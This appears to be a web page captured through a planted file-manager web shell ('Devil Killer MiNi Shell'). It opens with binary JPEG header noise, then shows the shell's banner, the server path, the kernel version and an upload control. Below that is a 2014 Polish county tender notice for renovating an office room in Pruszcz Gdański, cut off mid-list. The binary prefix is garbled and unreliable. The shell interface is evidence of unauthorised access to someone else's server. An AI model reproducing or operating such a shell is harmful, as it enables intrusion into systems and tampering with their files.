JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140731/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140731/165673-N-2014.html

<p class="kh_header"><b>Pruszcz Gdański: Remont pomieszczenia na trzecim piętrze budynku Starostwa   Powiatowego dla potrzeb Jednostki Realizującej Projekt. Zadanie realizowane   w ramach projektu: Kompleksowe Zabezpieczenie Przeciwpowodziowe Żuław  - Etap I - Powiat Gdański. Projekt współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Spójności w ramach Programu Operacyjnego Infrastruktura i Środowisko lata 2007 - 2013.</b><br>
<b>Numer ogłoszenia: 165673 - 2014; data zamieszczenia: 31.07.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Gdański z siedzibą w Pruszczu Gdańskim reprezentowany przez Zarząd Powiatu Gdańskiego , ul. Wojska Polskiego 16, 83-000 Pruszcz Gdański, woj. pomorskie, tel. 058 6834999, faks 058 6834899.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat-gdanski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont pomieszczenia na trzecim piętrze budynku Starostwa   Powiatowego dla potrzeb Jednostki Realizującej Projekt. Zadanie realizowane   w ramach projektu: Kompleksowe Zabezpieczenie Przeciwpowodziowe Żuław  - Etap I - Powiat Gdański. Projekt współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Spójności w ramach Programu Operacyjnego Infrastruktura i Środowisko lata 2007 - 2013..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest: Remont pomieszczenia na trzecim piętrze budynku Starostwa Powiatowego dla potrzeb Jednostki Realizującej Projekt. Zadanie realizowane w ramach projektu: Kompleksowe Zabezpieczenie Przeciwpowodziowe Żuław - Etap I - Powiat Gdański. Projekt współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Spójności w ramach Programu Operacyjnego Infrastruktura i Środowisko lata 2007 - 2013.
2.Zakres przedmiotu zamówienia:
 Pomieszczenie przeznaczone do remontu znajduje się na trzecim piętrze budynku Starostwa Powiatowego w Pruszczu Gdańskim przy ul. Wojska Polskiego 16 i obejmuje szczytową część pomieszczenia głównej - centralnej bryły budynku Starostwa po stronie północnej, i wykonane będzie w ramach inwestycji pn.: Remont pomieszczenia na trzecim piętrze budynku Starostwa Powiatowego dla potrzeb Jednostki Realizującej Projekt. Zadanie realizowane w ramach projektu: Kompleksowe Zabezpieczenie Przeciwpowodziowe Żuław - Etap I - Powiat Gdański. Projekt współfinansowany przez Unię Europejską    ze środków Europejskiego Funduszu Spójności w ramach Programu Operacyjnego Infrastruktura i Środowisko lata 2007 - 2013.
Przedmiotem zamówienia są roboty budowlane, które polegać będą na: gruntownym remoncie budowlano-instalacyjnego pomieszczenia zlokalizowanego na trzecim piętrze budynku Starostwa Powiatowego w Pruszczu Gdańskim w szczytowej, kopertowej części dachu, głównej - centralnej części bryły budynku Starostwa po stronie północnej w celu uzyskania dodatkowego pomieszczenia biurowego dla potrzeb Jednostki Realizującej Projekt. Prace remontowe obejmują zakres prac ogólnobudowlanych, instalacyjnych w zakresie centralnego ogrzewania, elektrycznych i elektrotechnicznych niskonapięciowych. Prace ogólnobudowlane polegać będą m.in. na: wzmocnieniu elementów konstrukcyjnych drewnianej więźby dachowej, wykonaniu podłogi podniesionej z wykończeniem panelami, zainstalowaniu okien połaciowych w trzech połaciach dachowych, dociepleniu połaci dachowych wełną mineralną, wykonaniu zabudów skosów połaci płytą gipsową GKF, wykonaniu tynków ścian  i zabudów meblowych dolnej części skosów połaci. 
Zamówienie obejmuje wykonanie robót zgodnie z Dokumentacją Projektową,  Specyfikacją Techniczną Wykonania i Odbioru Robót Budowlanych oraz
z przedmiarami robót stanowiącymi załącznik nr 9 do niniejszej SIWZ.
3.Szczegółowy opis przedmiotu zamówienia zawarty jest w:
dokumentacji projektowej oraz Specyfikacji  Technicznej Wykonania i Odbioru Robót Budowlanych (zał. nr 9 do SIWZ).
UWAGA:
Nazw materiałów, urządzeń lub producentów, które mogą pojawić się w dokumentacji projektowej nie należy traktować jako narzuconych bądź sugerowanych przez Zamawiającego. Zamawiający dopuszcza zastosowanie innego równoważnego (spełniającego wskazane parametry równoważności podane w STW i ORB) materiału lub urządzenia.
4.   Warunki prowadzenia robót:
-Zamawiający przekaże Wykonawcy do realizacji teren  budowy określony w dokumentacji projektowej.
-Wykonawca winien przestrzegać warunków prowadzenia robót zawartych w: - specyfikacjach technicznych wykonania i odbioru robót budowlanych,
 - uzgodnieniach i opiniach do dokumentacji projektowej,
 - decyzjach administracyjnych wydanych dla potrzeb realizacji zadania, w tym:  decyzja/pozwolenie na prowadzenie robót na terenie obiektu wpisanego do rejestru zabytków, decyzja/pozwolenie na budowę;
-Wykonawca zapewni warunki umożliwiające prawidłowe wykonanie prac budowlano-montażowych oraz uwzględni w wynagrodzeniu koszty z tym związane;
-rozpoczęcie prac winno być zgodne z godzinami otwarcia urzędu, tj. od 7.30
-prace powinny być prowadzone w sposób nieuciążliwy dla pracy urzędu (dopuszczalny poziom hałasu 85dB), z zachowaniem ostrożności i czystości prowadzenia prac   i z każdorazowym doprowadzeniem miejsca pracy po jej przerwaniu do stanu przed rozpoczęciem robót;
-prace uciążliwe (hałas, zanieczyszczenie powietrza) powinny być prowadzone poza godzinami pracy urzędu, jednak nie dłużej niż do godz. 20 jednocześnie zastrzega się,  aby prace prowadzone poza godzinami pracy urzędu zostały wcześniej ustalone   z Wydziałem Organizacyjnym Starostwa Powiatowego. 
-za sprawy dotyczące BHP, p.poż. oraz systemy alarmowe odpowiada Wykonawca;
-wykonawca powinien uwzględnić w ofercie zastosowanie odpowiednich zabezpieczeń, gwarantujących skuteczną osłonę, ochronę i zabezpieczenie przed pyłem przez cały okres trwania prac;
-Wykonawca zobowiązany jest do systematycznego prowadzenia prac porządkowych w rejonie terenu budowy;
-Wykonawca zobowiązany jest do prowadzenia robót w sposób zapewniający: a) bezpieczeństwo osób przebywających w sąsiedztwie terenu budowy i osób  przebywających na terenie budowy oraz ochronę
mienia,   b) bezpieczną i zgodną z przepisami technologię robót,   c) ochronę powietrza atmosferycznego przed zanieczyszczeniami przy robotach rozbiórkowych jak i przy zastosowaniu sprawnego i właściwie eksploatowanego sprzętu,  d) najmniej uciążliwą akustycznie technologię robót rozbiórkowych,  e) bezpieczeństwo konstrukcji budynku i urządzeń oraz właściwe warunki eksploatacyjne                                                                                               f) spełnienie wymagań ustawy z dnia07.07.1994r. Prawo Budowlane -( tekst jednolity Dz. U. z 2013r. Poz.1409.), 
  g) spełnienie wymagań Rozporządzenia Ministra Gospodarki z dnia 28.03.2013r. w sprawie bezpieczeństwa i higieny pracy przy urządzeniach i instalacjach energetycznych (D.U. z 2013r.Poz.492),                                                                                             h) spełnienie wymagań Rozporządzenia Ministra Infrastruktury z dnia 06.02.2003r. w sprawie bezpieczeństwa i higieny pracy podczas wykonywania robót budowlanych (Dz. U. Nr 47 poz.401.) 
spełnienie wymagań Rozporządzenia Ministra Infrastruktury z dnia 24.07.2009r. w sprawie przeciwpożarowego zaopatrzenia w wodę oraz dróg pożarowych (Dz. U. Nr 124 poz.1030)
Koszty wynikające z w/w zobowiązań należy uwzględnić w wynagrodzeniu ryczałtowym.
5. Zamawiający dopuszcza zatrudnienie podwykonawcy/podwykonawców.
5.1W przypadku zatrudnienia podwykonawcy/podwykonawców, w oparciu o art. 36b ust.1  Ustawy Zamawiający żąda wskazania przez Wykonawcę w ofercie części zamówienia,  których wykonanie zamierza powierzyć podwykonawcom. Do oferty należy załączyć informację na ten temat (wzór zał. nr 7 do SIWZ). 
5.2. Wykonawca, podwykonawca lub dalszy podwykonawca zamówienia na roboty budowlane zamierzający zawrzeć umowę o podwykonawstwo, której przedmiotem są  roboty budowlane, jest obowiązany, w trakcie realizacji zamówienia publicznego na roboty budowlane, do przedłożenia zamawiającemu projektu tej umowy, przy czym podwykonawca lub dalszy podwykonawca jest obowiązany dołączyć zgodę wykonawcy na zawarcie umowy o podwykonawstwo o treści zgodnej z projektem umowy. Postanowienie zdania poprzedzającego stosuje się ponadto do wszelkich zmian umów.
5.3. Termin zapłaty wynagrodzenia podwykonawcy lub dalszemu podwykonawcy  przewidziany w umowie o podwykonawstwo nie może być dłuższy niż 30 dni od dnia doręczenia wykonawcy, podwykonawcy lub dalszemu podwykonawcy faktury lub rachunku, potwierdzających wykonanie zleconej podwykonawcy lub dalszemu podwykonawcy dostawy, usługi lub roboty budowlanej. Umowa z podwykonawcą lub dalszym podwykonawcą musi zawierać postanowienie, że podwykonawca lub dalszy podwykonawca jest zobowiązany wystawić i doręczyć wykonawcy lub podwykonawcy 	fakturę za wykonane roboty budowlane najpóźniej w terminie 7 dni od daty odbioru robót danego podwykonawcy lub dalszego podwykonawcy przez wykonawcę, podwykonawcę 	lub dalszego podwykonawcę.
5.4. Wykonawca, podwykonawca lub dalszy podwykonawca zamówienia na roboty budowlane przedkłada zamawiającemu poświadczoną za zgodność z oryginałem kopię zawartej umowy o podwykonawstwo, której przedmiotem są roboty budowlane, w terminie 7 dni od dnia jej zawarcia.
5.5. W przypadku przedłożenia umowy o podwykonawstwo po uprzednim przedłożeniu projektu takiej umowy, wykonawca, podwykonawca lub dalszy podwykonawca ma obowiązek ujawnić i szczegółowo wskazać wszelkie ewentualne zmiany pomiędzy projektem, a podpisaną umową. Uchybienie obowiązkowi wskazanemu w zdaniu poprzedzającym, będzie traktowane jako celowe zatajenie zmian przed Zamawiającym.
5.6. Wykonawca, podwykonawca lub dalszy podwykonawca zamówienia na roboty budowlane przedkłada zamawiającemu poświadczoną za zgodność z oryginałem kopię zawartej umowy o podwykonawstwo, której przedmiotem są dostawy lub usługi, w terminie 7 dni 	od dnia jej zawarcia, z wyłączeniem umów o podwykonawstwo o wartości mniejszej niż 0,5% wartości umowy w sprawie zamówienia publicznego oraz umów o podwykonawstwo, których przedmiot został wskazany przez zamawiającego w specyfikacji istotnych warunków zamówienia, jako niepodlegający niniejszemu obowiązkowi. Wyłączenie, o którym mowa w zdaniu pierwszym, nie dotyczy umów o podwykonawstwo o wartości większej niż 50 000 zł. 
5.7. Umowa Wykonawcy z podwykonawcą będzie przewidywać wyłączenie potrąceń z wynagrodzenia podwykonawcy (dalszego podwykonawcy) oraz wyłączenie prawa do   dokonywania jakichkolwiek zatrzymań części lub całości wynagrodzenia podwykonawcy (dalszego podwykonawcy), w szczególności zatrzymań z tytułu tzw. kaucji gwarancyjnych.
5.8. Wszystkie umowy pomiędzy Wykonawcą i Podwykonawcami i dalszymi podwykonawcami muszą być zgodne z postanowieniami SIWZ (w tym postanowieniami umowy zawartej z Wykonawcą) i zawierać : 
a) zakres prac powierzonych do wykonania podwykonawcy/ dalszemu podwykonawcy, a w przypadku podwykonawstwa robót budowlanych również załączenie części dokumentacji technicznej dotyczącej zlecanej części,
b)terminy realizacji, przy czym terminy te nie mogą być dłuższe niż przewidziane niniejszą umową, 
c) wartość wynagrodzenia podwykonawcy, rozumianego jako wynagrodzenie za wykonanie robót budowlanych i związanych z tymi robotami dostaw materiałów budowlanych powierzanych do wykonania podwykonawcy lub dalszemu podwykonawcy przy czym wartość wynagrodzenia podwykonawcy`, nie może przekraczać kwoty niewypłaconego na dzień weryfikacji umowy przez Zamawiającego wynagrodzenia Wykonawcy, pomniejszonej o naliczone i przewidywane kary umowne oraz o pozostałe potrącenia i obniżenia ceny zgodnie z postanowieniami umowy zawartej z Wykonawcą i obowiązującymi przepisami. 
5.9. Wykonawca jest zobowiązany wprowadzenia postanowień odpowiadających postanowieniom ust. 5.2-5.8 w umowach wykonawcy, podwykonawcy lub dalszego podwykonawcy z podwykonawcami lub dalszymi podwykonawcami.
5.10. Postanowienia ust. 5.2-5.9 stosuje się odpowiednio do zmian umowy o podwykonawstwo.
5.11. Kwestie dotyczące podwykonawców określa wzór umowy - (zał. nr 4 do SIWZ).
UWAGA:
Zamawiający wyjaśnia, że istotą zapisu w punkcie 5.8 lit. c.  jest uniknięcie sytuacji, w której Zamawiający, pomimo dokonania zmniejszenia wynagrodzenia Wykonawcy (z jakichkolwiek przyczyn), musiałby dokonać zapłaty wynagrodzenia podwykonawcy lub dalszego podwykonawcy z kwoty, o którą obniżono wynagrodzenie Wykonawcy. Jeżeli Zamawiający uzna, że takie ryzyko występuje, to nie wyrazi zgody na zawarcie umowy z podwykonawcą lub dalszym podwykonawcą.  
Zamawiający zastrzega ponadto, że  jeżeli wynagrodzenie za wykonanie robót budowlanych i związanych z tymi robotami dostaw materiałów budowlanych powierzanych do wykonania Podwykonawcy lub dalszemu podwykonawcy będzie przekraczać wartości wskazane w kosztorysie ofertowym Wykonawcy, zarówno co do całości, jak i poszczególnych pozycji kosztorysu, będzie miał prawo  nie wyrazić zgody na zawarcie umowy.
6.Zamawiający sugeruje, aby wykonawca dokonał wizji lokalnej terenu budowy i jego otoczenia (wizja lokalna nie jest obowiązkowa), a także zdobył, na swoją własną odpowiedzialność i ryzyko, wszelkie dodatkowe informacje, które mogą być konieczne    do przygotowania oferty oraz zawarcia umowy i wykonania zamówienia. 
7.Wykonawca umieści na placu budowy dwie tablice informacyjne (o wymiarach  szerokość 300cm wysokość 200cm) z wydrukiem kolorowym wodoodpornym. 
1) Projekt graficzny tablicy informacyjnej dostarczony zostanie przez zamawiającego po podpisaniu umowy. Koszt wykonania 2 tablic informacyjnych należy uwzględnić w wynagrodzeniu ryczałtowym. 
2) Tablice informacyjne stosuje się w przypadku inwestycji, realizowanych w ramach dofinansowania z Unii Europejskiej. Tablice te powinny być umieszczone na terenie realizacji zadania w sposób trwały, zabezpieczający je przed zniszczeniem oraz w widocznym miejscu. Tablice powinny być wykonane zgodnie  zasadami podanymi na stronach programu POIiŚ (https://www.pois.gov.pl/zpfe/strony/dokumenty.aspx ) w dokumencie Zasady promocji projektów dla beneficjentów Programu Operacyjnego Infrastruktura i Środowisko 2007-2013 
8. Zamawiający dopuszcza rozwiązania równoważne opisywane w specyfikacji technicznej wykonania i odbioru robót - w zakresie wskazanych norm/aprobat/specyfikacji technicznych/ systemów  odniesienia. Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez Zamawiającego, jest obowiązany wykazać, że    
oferowane 	przez niego dostawy, usługi lub roboty budowlane spełnią wymagania określone przez Zamawiającego.
9.W trakcie prowadzenia robót należy przestrzegać przepisów BHP zawartych w Rozporządzeniu Ministra Infrastruktury z dnia 6 lutego 2003 roku (Dz. U. z 2003 roku, Nr 47 poz. 401) w sprawie bezpieczeństwa i higieny pracy podczas wykonywania robót budowlanych..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zgodnie z  art. 36 ust. 2, pkt. 3 ustawy, Zamawiający przewiduje możliwość udzielenia w okresie trwania umowy ewentualnych zamówień uzupełniających w trybie z wolnej ręki, których wartość nie przekroczy 50% wartości zamówienia podstawowego, na zasadach określonych w art. 67 ust. 1 pkt. 6 ustawy PZP</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.11.00-9, 45.21.00.00-2, 45.31.00.00-3, 45.31.22.00-9, 45.31.21.00-8, 45.33.20.00-3, 45.41.00.00-4, 45.42.10.00-4, 45.42.20.00-1, 45.44.21.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Wadium wnosi się przed upływem terminu składania ofert.
2. Wykonawca zobowiązany jest do wniesienia wadium w wysokości 2.000,00 zł (słownie: dwa tysiące złotych 00/100) najpóźniej w dniu składania ofert przed godz. 11.30 dnia 18.08.2014 r. W przypadku jeżeli do godz. 11:30 dnia 18.08.2014 r. nie wpłynie wymagana kwota wadium na konto Zamawiającego, będzie to oznaczało, że wadium nie zostało wniesione.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni warunek za spełniony, gdy Wykonawcy wykażą się prowadzeniem działalności gospodarczej w zakresie robót budowlanych zgodnych z zakresem zamówienia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni warunek za spełniony, gdy Wykonawcy wykażą się wykonaniem
w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, minimum 2 robót budowlanych, odpowiadających swym rodzajem i wartością robotom stanowiącym przedmiot zamówienia (z podaniem ich wartości oraz daty i miejsca wykonania) o wartości nie mniejszej niż 40.000,00 zł każda, oraz załączy dowody dotyczące najważniejszych robót, określających, czy roboty te zostały wykonane  w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej
i prawidłowo ukończone. 
W celu potwierdzenia spełnienia  tego warunku Wykonawca zobowiązany jest wypełnić tabelę (załącznik nr 6 do SIWZ)
UWAGA:
Dowodami, o których mowa w ust. VII ust. pkt.2 są:
- poświadczenia lub 
- inne dokumenty - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca, nie jest w stanie uzyskać poświadczenia, o którym mowa powyżej.                                            
-  w przypadku, gdy Zamawiający jest podmiotem, na rzecz, którego roboty budowlane wskazane w wykazie, o którym mowa w pkt. 2, zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania dowodów opisanych w pkt. 2.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wymaga dokumentów potwierdzających  spełnienie tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  uzna   warunek  za  spełniony, gdy Wykonawcy ubiegający się o zamówienie będą dysponować w dniu rozpoczęcia robót osobami zdolnymi do wykonania zamówienia, posiadającymi doświadczenie, wykształcenie i kwalifikacje zawodowe odpowiednie   do stanowiska jakie zostaną im powierzone tj: 
- kierownika budowy posiadającego aktualne uprawnienia do kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej oraz aktualne i obowiązujące zaświadczenie o przynależności do właściwej izby samorządu zawodowego
- kierownika robót posiadającego aktualne uprawnienia do kierowania robotami w specjalności  instalacyjnej w zakresie sieci, instalacji oraz urządzeń elektrycznych i elektroenergetycznych   oraz aktualne i obowiązujące zaświadczenie o przynależności do właściwej izby samorządu  	 zawodowego,
- kierownika robót posiadającego aktualne uprawnienia do kierowania robotami w specjalności  instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych oraz aktualne i obowiązujące zaświadczenie o  przynależności do właściwej izby samorządu zawodowego,
-  osobę posiadającą aktualne  uprawnienia do prowadzenia robót w specjalności  telekomunikacyjnej i teletechnicznej.
W celu potwierdzenia spełnienia  tego warunku Wykonawca zobowiązany jest wypełnić oświadczenie (załącznik nr 5 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni warunek za spełniony, gdy Wykonawcy ubiegający się o zamówienie posiadają opłaconą polisę ubezpieczeniową od odpowiedzialności cywilnej (lub inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej) w zakresie prowadzonej działalności gospodarczej, związanej z przedmiotem niniejszego zamówienia,   na wartość co najmniej 50.000,00 zł.

Jeżeli Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, (niezależnie od charakteru prawnego łączących go z nimi stosunków) zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. Ww. zobowiązanie musi zostać załączone do oferty przetargowej w oryginale.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
